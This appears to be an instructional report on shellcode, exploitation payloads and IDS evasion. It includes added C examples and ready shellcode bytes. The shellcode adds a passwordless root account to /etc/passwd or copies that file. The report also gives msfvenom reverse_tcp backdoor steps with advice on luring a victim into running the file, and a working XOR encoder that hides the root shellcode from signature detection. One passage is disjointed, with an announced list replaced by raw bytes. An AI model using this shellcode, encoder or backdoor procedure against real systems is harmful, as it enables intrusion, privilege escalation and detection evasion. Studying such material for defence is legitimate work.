Shellcode is a sequence of machine instructions that is injected into an exploited program and then executed by it. It is used to take direct control of the processor's registers and of the functionality of the compromised application [4]. Shellcode can be written in a high-level language, but in some scenarios the compiled output will not behave as intended (for example, it may contain bytes the injection channel cannot carry, or rely on a runtime that is not present in the target process), so low-level assembly language is favoured for shellcode generation.
For any exploitation, the baseline of an attack is the severity of the flaws in the application or network gateway that is going to be exploited [4]. The impact of an exploitation-based attack depends on successfully exploiting the discovered vulnerability, so a detailed vulnerability scan of the targeted machine or application helps the attack to succeed.
The three main components of any exploitation attack are the vector used for the attack, the technique used for the exploitation, and the payload chosen for the attack.
Attack vector: An attack vector is the technique or means by which an attacker gains access to a targeted computer or network and, in doing so, delivers a specific payload or malicious code segment. Attack vectors let the attacker exploit the vulnerabilities found by scanning a system or network server.
These attack vectors include shellcode, e-mail attachments, viruses, pop-up windows, chat rooms, instant messages and so on. Most of these vectors are software components and, in some cases, hardware components. In exploitation attacks the users are deceived and the system's vulnerabilities are exploited using components such as shellcode.
To some extent, antivirus and firewall applications are able to block some attack vectors from entering the system or network [5]. A defence that is effective against an exploitation attack for some time may not remain effective forever, because attackers constantly change and update their vectors with new techniques in order to gain unauthorized access to the servers, networks or workstations inside the network.
Payload for the attack: The exploit payload is the functional component of any exploitation-based attack. Typical payloads are bind shells, reverse shells or the Meterpreter shell. In an exploitation attack the payload is the part of the virus, malware or worm that is responsible for carrying out the malicious action on the victim machine or network.
Three types of payload are used in attacks: stagers, stages and singles.
Stagers: These payloads are small and are mainly intended to establish a communication channel between the victim machine and the attacker machine; once the channel is up, the process moves on to the next stage. The channel established between attacker and target is reliable, and this kind of payload lets attackers re-use code developed for an attack [1], because establishing the channel is separated from the actual attack stage.
Stages: These payload modules are downloaded by the stager. Because the stager takes care of the communication channel, stage payloads are often larger and offer many options for what is delivered and carried out.
Singles: These payloads are self-contained and do not depend on any other module; the whole payload, including the part that communicates between the victim machine and the attacker machine, is delivered in one piece by Metasploit [3].
Exploitation technique: The attack algorithm used to exploit the vulnerability is known as the exploitation technique.
Most intrusion detection systems depend on pre-defined signatures of known malware, shellcode or viruses [4]. One of the most popular methods of evading an IDS is the use of polymorphic shellcode. Polymorphism is a strategy of transforming the malicious code so that it is represented differently each time it is produced, while still working exactly as it did before the transformation.
With polymorphism, attackers evade IDS detection because the detector looks for a match against its predefined signatures, and the transformed shellcode no longer matches them [1]. Polymorphic engines are used to create polymorphic shellcode.
In computing, the program counter is a special register that holds the address of the next instruction of a program that the processor is going to execute.
Both data and program instructions have addresses in the system's memory. Instructions are fetched from the memory location that the program counter points to and are then executed by the processor.
Each time the processor executes an instruction, the program counter is updated with the address of the instruction that will be fetched from memory and executed next [4]. As part of the execution cycle the program counter's value is placed in the memory address register; for a sequential instruction the program counter is then simply advanced to the following instruction, whereas a jump, call or return loads it with a new address instead.
An attacker can exploit a vulnerability on the targeted machine or server through control-flow hijacking [2]. In this process the attacker gains control over the program counter, typically by overwriting a saved return address or a function pointer that will later be loaded into it, and redirects the flow of execution so that the targeted machine or server performs the action the attacker wants.
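As an added illustration of the mechanism described above (this is editorial example code, not taken from the paper or from any of the cited works), the following C program models a tiny CPU with a program counter and a downward-growing stack. Its handler routine copies attacker-supplied input into a three-word local buffer without checking the length; the fourth input word lands on the saved return address, so the RET instruction loads the program counter with an address the attacker chose and execution arrives at a routine the program never calls. The machine, its instruction set and all addresses are invented for the example; the bounds_check flag shows the one-line fix.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy machine: 64 words of memory, stack grows down from the top. One
 * instruction is one word: opcode in the high byte, operand in the low 24 bits. */
#define MEM_WORDS 64
#define OPC(w) ((w) >> 24)
#define IMM(w) ((w) & 0xffffffu)
#define INS(op, imm) (((uint32_t)(op) << 24) | ((uint32_t)(imm) & 0xffffffu))

enum { OP_HALT, OP_CALL, OP_FRAME, OP_READ, OP_RET, OP_PRIV };

typedef struct {
    uint32_t mem[MEM_WORDS];
    uint32_t pc;          /* program counter: address of the next instruction */
    uint32_t sp;          /* stack pointer: mem[sp] is the top of stack */
    uint32_t frame;       /* size of the current routine's local buffer */
    int privileged;       /* set only by OP_PRIV, which the program never calls */
    int bounds_check;     /* 1: hardened OP_READ, 0: vulnerable OP_READ */
} cpu_t;

/* Fetch-decode-execute loop. in/n is the attacker-controlled input that OP_READ
 * copies into the current local buffer. Returns 0 on HALT, -1 on a fault. */
static int run(cpu_t *c, const uint32_t *in, uint32_t n)
{
    for (int steps = 0; steps < 1000; steps++) {
        if (c->pc >= MEM_WORDS) return -1;
        uint32_t w = c->mem[c->pc++];          /* fetch; PC now points past it */
        switch (OPC(w)) {
        case OP_HALT: return 0;
        case OP_CALL:                           /* push return address, load PC */
            if (c->sp == 0) return -1;
            c->mem[--c->sp] = c->pc;
            c->pc = IMM(w);
            break;
        case OP_FRAME:                          /* reserve IMM words of locals */
            c->frame = IMM(w);
            if (c->frame > c->sp) return -1;
            c->sp -= c->frame;
            break;
        case OP_READ: {
            uint32_t count = n;
            if (c->bounds_check && count > c->frame)
                count = c->frame;               /* the fix: clamp to the buffer */
            for (uint32_t i = 0; i < count; i++) {
                if (c->sp + i >= MEM_WORDS) return -1;
                c->mem[c->sp + i] = in[i];      /* unchecked: runs into the saved PC */
            }
            break;
        }
        case OP_RET:                            /* drop locals, pop return address into PC */
            c->sp += c->frame;
            if (c->sp >= MEM_WORDS) return -1;
            c->pc = c->mem[c->sp++];
            break;
        case OP_PRIV: c->privileged = 1; break;
        default: return -1;
        }
    }
    return -1;
}

/* main at 0 calls a handler at 10 that reads input into a 3-word buffer.
 * The routine at 30 sets the privileged flag and is reachable only if the
 * saved return address has been overwritten with 30. */
static void load_program(cpu_t *c, int hardened)
{
    memset(c, 0, sizeof *c);
    c->sp = MEM_WORDS;
    c->bounds_check = hardened;
    c->mem[0]  = INS(OP_CALL, 10);
    c->mem[1]  = INS(OP_HALT, 0);
    c->mem[10] = INS(OP_FRAME, 3);
    c->mem[11] = INS(OP_READ, 0);
    c->mem[12] = INS(OP_RET, 0);
    c->mem[30] = INS(OP_PRIV, 0);
    c->mem[31] = INS(OP_HALT, 0);
}

/* Constructed 4-word input: three words of filler, then the address 30 that
 * overwrites the saved return address. Returns 1 if execution was diverted
 * to the privileged routine, 0 if not, -1 on a fault. */
int hijack_demo(int hardened)
{
    cpu_t c;
    const uint32_t payload[4] = { 0x41414141, 0x42424242, 0x43434343, 30 };
    load_program(&c, hardened);
    if (run(&c, payload, 4) != 0) return -1;
    return c.privileged;
}

int main(void)
{
    printf("vulnerable read:     privileged=%d\n", hijack_demo(0));
    printf("bounds-checked read: privileged=%d\n", hijack_demo(1));
    return 0;
}
```

With the vulnerable read the program halts at address 31 after passing through OP_PRIV; with the clamp in place the saved return address survives and control returns to address 1 as intended.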
The following are the advantages of using an alphanumeric engine for generating shellcode compared to any other engine.
\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\x8B
\x0D\x00\x00\x00\x00\xBA\x13\x00\x00\x00\xCD
\x80\xB8\x03\x00\x00\x00\xBB\x01\x00\x00\x00\x8B
\x0D\x00\x00\x00\x00\xBA\x17\x00\x00\x00\xCD\x80
\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\x8B\x0D
\x00\x00\x00\x00\xBA\x17\x00\x00\x00\xB8\x01\x00
\x00\x00\xBB\x00\x00\x00\x00\xCD\x80
Identification: The above is 32-bit Linux shellcode that uses int 0x80 system calls. It issues write(1, buf, 19), then read(1, buf, 23), sets up a second write(1, buf, 23) and finally calls exit(0). The buffer pointer is loaded with "mov ecx, [0x00000000]", an absolute address left as a zero placeholder that has to be patched before use (as written it dereferences address 0). Two things are worth noticing: the second write is never issued, because eax is overwritten with 1 (exit) before its int 0x80, and the code is full of NUL bytes, which rules it out for any injection through a string-copy operation.
\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68
\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66
\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2
\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68
\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a
\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80
Identification: The above shellcode appends a root-privileged user named r00t with no password to the Linux /etc/passwd file. It builds the path "/etc//passwd" on the stack, opens it with O_WRONLY|O_APPEND, writes the 12-byte entry "r00t::0:0:::" (empty password field, UID 0, GID 0, empty GECOS, home and shell), closes the file and exits. It is written with the push/pop idiom, so it contains no NUL bytes; note that it does not write a trailing newline, so the entry is parsed as a line of its own only if the existing file already ends with one.
\x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64
\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c
\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9
\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31
\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74
\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4
\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89
\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd
\x80
Identification: The above shellcode opens the /etc/passwd file read-only, reads its contents into a buffer on the stack, then opens /tmp/outfile with O_CREAT|O_RDWR (mode 0644), writes the buffer to it and exits. The attacker thereby obtains a copy of all the user-account entries. On modern Linux systems, however, /etc/passwd is world-readable and the password hashes are kept in /etc/shadow, so this code matters mainly as a template for file-to-file copying shellcode rather than as a way to obtain password data.
The first command used is "msfconsole", which opens the Metasploit console. After that, "show exploits" lists the exploits available for attacking any kind of machine.
In the attack described, "exploit/multi/handler" is used by the attacker to receive the connection from the victim machine, and "set PAYLOAD windows/meterpreter/reverse_tcp" selects the payload for the attack. The payload file itself is generated with "msfvenom -p windows/meterpreter/reverse_tcp LHOST=<address> LPORT=<port>", where LHOST is the IP address of the attacker machine and LPORT is the port on which the handler listens; because both machines are on the same network, the target can reach the attacker's address directly. The handler is configured with matching "set LHOST" and "set LPORT" values, so that when the payload runs on the victim it connects back to the port on which the handler is waiting [4]. The final stage is delivering the resulting backdoor file to the Windows machine, packaged with a suitable name and message so that it gets run.
For this attack a reverse shell payload can be used to exploit the target. A reverse shell is a shell in which the target machine connects back to the attacking machine: the attacking machine listens on a port, and once the connection is established it uses the resulting shell to execute whatever commands need to be carried out.
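The staged reverse-TCP exchange described in the payload section and in the Metasploit procedure above, as an added example (editorial C code, not Metasploit's own stager or handler). Both roles run in one process over loopback: the handler listens, the stager connects back to LHOST:LPORT, the handler sends a 4-byte little-endian length followed by the stage, and the stager reads exactly that many bytes. The framing is modelled on the length-prefixed scheme reverse_tcp stagers commonly use, but the exact wire protocol of real stagers varies. The stage contents are a constructed placeholder string rather than executable code, MAX_STAGE is an assumed sanity limit, and a real stager would map the received buffer executable and jump into it, which this code deliberately does not do.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAX_STAGE (16u * 1024 * 1024)   /* assumed limit: refuse absurd stage lengths */

/* TCP delivers data in arbitrary pieces: loop until all bytes are moved, or fail. */
static int read_full(int fd, uint8_t *b, size_t n)
{
    for (size_t got = 0; got < n; ) {
        ssize_t r = read(fd, b + got, n - got);
        if (r <= 0) return -1;
        got += (size_t)r;
    }
    return 0;
}
static int write_full(int fd, const uint8_t *b, size_t n)
{
    for (size_t sent = 0; sent < n; ) {
        ssize_t w = write(fd, b + sent, n - sent);
        if (w <= 0) return -1;
        sent += (size_t)w;
    }
    return 0;
}

/* Victim side (stager): connect back to LHOST:LPORT. Returns a socket or -1. */
int stager_connect(const char *lhost, uint16_t lport)
{
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(lport);
    if (inet_pton(AF_INET, lhost, &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) { close(fd); return -1; }
    return fd;
}

/* Victim side: read a 4-byte little-endian length, then the stage itself. A real
 * stager maps the buffer executable and jumps into it; here the bytes are
 * returned (caller frees) so they can be inspected instead. NULL on failure. */
uint8_t *stager_receive(int fd, uint32_t *len_out)
{
    uint8_t h[4];
    if (read_full(fd, h, 4) != 0) return NULL;
    uint32_t len = h[0] | h[1] << 8 | h[2] << 16 | (uint32_t)h[3] << 24;
    if (len == 0 || len > MAX_STAGE) return NULL;       /* length sanity check */
    uint8_t *stage = malloc(len);
    if (stage && read_full(fd, stage, len) != 0) { free(stage); stage = NULL; }
    if (stage) *len_out = len;
    return stage;
}

/* Attacker side (handler): listen on 127.0.0.1 on a kernel-chosen port. */
int handler_listen(uint16_t *port_out)
{
    struct sockaddr_in sa;
    socklen_t sl = sizeof sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    inet_pton(AF_INET, "127.0.0.1", &sa.sin_addr);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) != 0 || listen(fd, 1) != 0 ||
        getsockname(fd, (struct sockaddr *)&sa, &sl) != 0) { close(fd); return -1; }
    *port_out = ntohs(sa.sin_port);
    return fd;
}

/* Attacker side: push the stage, length-prefixed, down the established channel. */
int handler_send_stage(int fd, const uint8_t *stage, uint32_t len)
{
    uint8_t h[4] = { len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, len >> 24 };
    return (write_full(fd, h, 4) == 0 && write_full(fd, stage, len) == 0) ? 0 : -1;
}

/* The whole exchange on loopback, both roles in one process. Returns 1 if the
 * stager received exactly the bytes the handler sent. */
int staged_reverse_tcp_demo(void)
{
    static const uint8_t stage[] = "constructed placeholder stage, not real code";
    uint16_t port; uint32_t got_len = 0; int ok = 0;
    int lfd = handler_listen(&port);
    if (lfd < 0) return 0;
    int vfd = stager_connect("127.0.0.1", port);          /* LHOST, LPORT */
    int afd = vfd < 0 ? -1 : accept(lfd, NULL, NULL);     /* handler sees the callback */
    if (afd >= 0 && handler_send_stage(afd, stage, sizeof stage) == 0) {
        uint8_t *got = stager_receive(vfd, &got_len);
        ok = got != NULL && got_len == sizeof stage && memcmp(got, stage, got_len) == 0;
        free(got);
    }
    if (afd >= 0) close(afd);
    if (vfd >= 0) close(vfd);
    close(lfd);
    return ok;
}

int main(void)
{
    printf("staged reverse_tcp exchange ok=%d\n", staged_reverse_tcp_demo());
    return 0;
}
```

The separation visible here is exactly why stagers are reusable: stager_connect and stager_receive know nothing about what the stage does, and the handler can push any stage down the same channel. The length check in stager_receive is the kind of sanity test that a minimal stager written in assembly usually omits.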
There are a large number of methods used for generating shellcode. A list is provided below:
pwntools: This is considered an essential part of the CTF toolkit. It is an exploit-development library written in Python and designed for rapid development and prototyping [2]. It offers many features, but here only its shellcode generation is of interest: its shellcraft module produces assembly source from Python, which is then assembled into raw shellcode [1]. pwntools does not require the attacker to know assembly in order to create a shell; tools of this kind help to write shellcode in a better and faster way.
NASM: This is the most basic approach to generating shellcode. The shellcode is written as assembly source, assembled with NASM, and the raw bytes are extracted from the resulting object file.
Shellforge: Developed in Python, it provides the ability to develop shellcode from C source code.
Synesthesia approach: Compared with the other approaches this is the most recent one. It is based on the following restrictions, which make the resulting shellcode more capable of hiding from monitoring tools [3]. The constraints of this approach are listed below:
No NUL bytes are allowed in the shellcode; every ASCII letter is converted to upper case; and, because the shellcode may be delivered through a format string, the "%" character is avoided to make it more reliable.
All the bytes in the shellcode must be printable (or, more strictly, alphanumeric) in order to escape the IDS.
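To make the delivery constraints listed above concrete, here is an added C example (editorial code, not the Synesthesia tool or any of the cited works) that parses a shellcode dump written either as "\x6a\x05" or in the backslash-less "x6ax05" form in which the dumps on this page were reproduced, and counts the bytes that each constraint forbids. The three samples embedded at the bottom are the first eleven bytes of the write/read/exit shellcode above, the complete r00t /etc/passwd shellcode above, and a four-byte constructed alphanumeric fragment; the 512-byte parse buffer is an arbitrary limit.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Parse "\x6a\x05..." or "x6ax05..." into raw bytes, skipping whitespace.
 * Returns the byte count, or -1 on a bad escape or when `out` is too small. */
int parse_dump(const char *s, uint8_t *out, size_t cap)
{
    size_t n = 0;
    while (*s) {
        if (isspace((unsigned char)*s)) { s++; continue; }
        if (*s == '\\') s++;
        if (*s != 'x' && *s != 'X') return -1;
        int hi = hexval((unsigned char)s[1]);
        int lo = hi < 0 ? -1 : hexval((unsigned char)s[2]);
        if (lo < 0 || n >= cap) return -1;
        out[n++] = (uint8_t)(hi << 4 | lo);
        s += 3;
    }
    return (int)n;
}

typedef struct { size_t len, nulls, nonprintable, nonalnum; } sc_stats;

/* Count the bytes each delivery constraint forbids: NUL (terminates a
 * strcpy-style copy), non-printable (7-bit text channels) and non-alphanumeric
 * (alphanumeric engines). A shellcode that meets a constraint scores zero. */
sc_stats check_constraints(const uint8_t *sc, size_t len)
{
    sc_stats st = { len, 0, 0, 0 };
    for (size_t i = 0; i < len; i++) {
        if (sc[i] == 0) st.nulls++;
        if (sc[i] < 0x20 || sc[i] > 0x7e) st.nonprintable++;
        if (!isalnum(sc[i])) st.nonalnum++;
    }
    return st;
}

/* One-number view for quick checks: which = 'l' length, '0' NULs,
 * 'p' non-printable, anything else non-alphanumeric; -1 on a parse error. */
long dump_stat(const char *dump, char which)
{
    uint8_t buf[512];
    int n = parse_dump(dump, buf, sizeof buf);
    if (n < 0) return -1;
    sc_stats st = check_constraints(buf, (size_t)n);
    switch (which) {
    case 'l': return (long)st.len;
    case '0': return (long)st.nulls;
    case 'p': return (long)st.nonprintable;
    default:  return (long)st.nonalnum;
    }
}

/* First eleven bytes of the write/read/exit shellcode shown above. */
const char *SAMPLE_WITH_NULS = "\\xB8\\x04\\x00\\x00\\x00\\xBB\\x01\\x00\\x00\\x00\\x8B";
/* The r00t /etc/passwd shellcode shown above, in the backslash-less dump form. */
const char *SAMPLE_R00T =
    "x6ax05x58x31xc9x51x68x73x73x77x64x68"
    "x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
    "xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
    "x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
    "x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
    "x06x58xcdx80x6ax01x58xcdx80";
/* Constructed alphanumeric fragment: push eax / pop ecx / dec ecx / dec ecx. */
const char *SAMPLE_ALNUM = "\\x50\\x59\\x49\\x49";

int main(void)
{
    const char *names[] = { "write/read/exit", "r00t passwd", "alnum fragment" };
    const char *dumps[] = { SAMPLE_WITH_NULS, SAMPLE_R00T, SAMPLE_ALNUM };
    for (int i = 0; i < 3; i++)
        printf("%-16s bytes=%ld NUL=%ld nonprintable=%ld nonalnum=%ld\n", names[i],
               dump_stat(dumps[i], 'l'), dump_stat(dumps[i], '0'),
               dump_stat(dumps[i], 'p'), dump_stat(dumps[i], 'a'));
    return 0;
}
```

Run on the page's own dumps, the write/read/exit code fails the NUL constraint outright, the r00t code is NUL-free but far from printable, and only the alphanumeric fragment passes every check.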
Use of msfvenom: Another popular approach to generating shellcode is msfvenom, which is part of the Metasploit framework. Shellcode generated this way can be encoded so that it contains only the characters, for example ASCII characters, that the exploitation channel allows.
The benefit of this solution is that nothing has to be written by hand: predefined shellcode is available for many platforms. The biggest disadvantage of NASM, by contrast, is that it is not useful for generating shellcode for other platforms such as Android.
A well-known technique is to encode the shellcode that carries out the exploitation into a polymorphic form, since it is the shellcode that the signatures identify. Polymorphism is considered the best technique for this situation [5]. The attacker scrambles or compresses the shellcode and prepends a small piece of code that decodes or decompresses it at run time inside the exploit. Because the shellcode's signature does not appear in the polymorphic form, the IPS can fail to detect it.
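The encode-then-prepend-a-decoder scheme described here and in the polymorphic shellcode discussion earlier, as an added example (editorial C code, not a Metasploit encoder or the method of any cited work). It uses the classic 20-byte 32-bit x86 jmp/call/pop XOR decoder stub, picks a per-generation key from a small seeded generator so that the same payload yields different bytes each time while never producing a NUL, and uses the r00t /etc/passwd shellcode from this page as the payload. The stub bytes are real x86 machine code but are never executed here; xor_decode reproduces the stub's effect in C so the round trip can be verified, and the string "r00t" stands in for an IDS signature.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit x86 XOR decoder stub (20 bytes). jmp/call/pop loads the address of
 * the encoded bytes into esi, the loop XORs LEN of them with KEY in place,
 * and execution falls through into the decoded payload. */
static const uint8_t STUB[20] = {
    0xEB, 0x0D,                   /* jmp short +0x0D -> the call below   */
    0x5E,                         /* pop esi        ; esi = payload       */
    0x31, 0xC9,                   /* xor ecx, ecx                         */
    0xB1, 0x00,                   /* mov cl, LEN    ; patched at [6]      */
    0x80, 0x36, 0x00,             /* xor byte [esi], KEY ; patched at [9] */
    0x46,                         /* inc esi                              */
    0xE2, 0xFA,                   /* loop -6 -> xor byte [esi]            */
    0xEB, 0x05,                   /* jmp short +5 -> decoded payload      */
    0xE8, 0xEE, 0xFF, 0xFF, 0xFF  /* call -0x12 -> pop esi                */
};
#define STUB_LEN_OFF 6
#define STUB_KEY_OFF 9

/* The /etc/passwd "r00t" shellcode shown earlier on this page (69 bytes). */
static const uint8_t R00T_SC[] = {
    0x6a,0x05,0x58,0x31,0xc9,0x51,0x68,0x73,0x73,0x77,0x64,0x68,
    0x2f,0x2f,0x70,0x61,0x68,0x2f,0x65,0x74,0x63,0x89,0xe3,0x66,
    0xb9,0x01,0x04,0xcd,0x80,0x89,0xc3,0x6a,0x04,0x58,0x31,0xd2,
    0x52,0x68,0x30,0x3a,0x3a,0x3a,0x68,0x3a,0x3a,0x30,0x3a,0x68,
    0x72,0x30,0x30,0x74,0x89,0xe1,0x6a,0x0c,0x5a,0xcd,0x80,0x6a,
    0x06,0x58,0xcd,0x80,0x6a,0x01,0x58,0xcd,0x80
};

/* Choose a non-zero key that equals no payload byte, so the encoded form has no
 * NUL. `seed` drives a small LCG: a fresh seed per generation gives a different
 * key and therefore different bytes for the same payload. Returns 0 on failure. */
uint8_t pick_key(const uint8_t *p, size_t len, uint32_t seed)
{
    for (int tries = 0; tries < 256; tries++) {
        seed = seed * 1103515245u + 12345u;
        uint8_t k = (uint8_t)(seed >> 16);
        size_t i = 0;
        while (k != 0 && i < len && p[i] != k) i++;
        if (k != 0 && i == len) return k;
    }
    return 0;
}

/* Emit stub + XOR-encoded payload into out. Returns the total length or -1. */
int encode_shellcode(const uint8_t *p, size_t len, uint8_t key, uint8_t *out, size_t cap)
{
    if (len == 0 || len > 255 || key == 0 || cap < sizeof STUB + len) return -1;
    memcpy(out, STUB, sizeof STUB);
    out[STUB_LEN_OFF] = (uint8_t)len;
    out[STUB_KEY_OFF] = key;
    for (size_t i = 0; i < len; i++) out[sizeof STUB + i] = p[i] ^ key;
    return (int)(sizeof STUB + len);
}

/* What the stub does at run time, written in C so the result is checkable. */
void xor_decode(uint8_t *b, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++) b[i] ^= key;
}

/* Naive signature scan: does sig (siglen bytes) occur anywhere in buf? */
int has_signature(const uint8_t *buf, size_t n, const uint8_t *sig, size_t siglen)
{
    for (size_t i = 0; i + siglen <= n; i++)
        if (memcmp(buf + i, sig, siglen) == 0) return 1;
    return 0;
}

/* Encode R00T_SC with a seed-derived key and check the three properties that
 * matter: the "r00t" signature no longer occurs, no NUL was introduced, and
 * decoding restores the original. Returns 1 when all three hold. */
int polymorph_demo(uint32_t seed)
{
    static const uint8_t sig[4] = { 'r', '0', '0', 't' };
    uint8_t out[128];
    uint8_t key = pick_key(R00T_SC, sizeof R00T_SC, seed);
    int n = encode_shellcode(R00T_SC, sizeof R00T_SC, key, out, sizeof out);
    if (n < 0) return 0;
    if (!has_signature(R00T_SC, sizeof R00T_SC, sig, 4)) return 0; /* plain form must match */
    if (has_signature(out, (size_t)n, sig, 4)) return 0;            /* encoded form must not */
    if (memchr(out, 0, (size_t)n) != NULL) return 0;                 /* still NUL-free */
    xor_decode(out + sizeof STUB, sizeof R00T_SC, key);
    return memcmp(out + sizeof STUB, R00T_SC, sizeof R00T_SC) == 0;
}

int main(void)
{
    uint8_t out[128];
    uint8_t key = pick_key(R00T_SC, sizeof R00T_SC, 0x1234);
    int n = encode_shellcode(R00T_SC, sizeof R00T_SC, key, out, sizeof out);
    printf("key=0x%02x total=%d demo=%d\n", key, n, polymorph_demo(0x1234));
    for (int i = 0; i < n; i++) printf("\\x%02x", out[i]);
    printf("\n");
    return 0;
}
```

A single-byte XOR is the simplest possible engine and the decoder stub itself is constant, so a signature written against the 20 stub bytes would still match; production encoders vary the stub as well, which is what separates a polymorphic engine from a plain encoder.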
[1] J. Mason, S. Small, F. Monrose and G. MacManus, "English shellcode," in Proceedings of the 16th ACM Conference on Computer and Communications Security, pp. 524-533, 2009.
[2] T. Cheng, Y. Lin, Y. Lai and P. Lin, "Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems," IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.
[3] K. Iwamoto and K. Wasaki, "A Method for Shellcode Extraction from Malicious Document Files Using Entropy and Emulation," International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[4] T. Okamoto, "SecondDEP: Resilient Computing that Prevents Shellcode Execution in Cyber-Attacks," Procedia Computer Science, vol. 60, pp. 691-699, 2015.
[5] M. Chen, C. Hu, D. Tian, X. Wang, Y. Liu and N. Li, "Shellix: An Efficient Approach for Shellcode Detection," International Journal of Security and Its Applications, vol. 10, no. 6, pp. 107-122, 2016.
[6] T. Lu, L. Zhang and Y. Fu, "A Novel Immune-Inspired Shellcode Detection Algorithm Based on Hyperellipsoid Detectors," Security and Communication Networks, vol. 2018, pp. 1-10, 2018.
[7] I. Arce, "The shellcode generation," IEEE Security & Privacy, vol. 2, no. 5, pp. 72-76, 2004.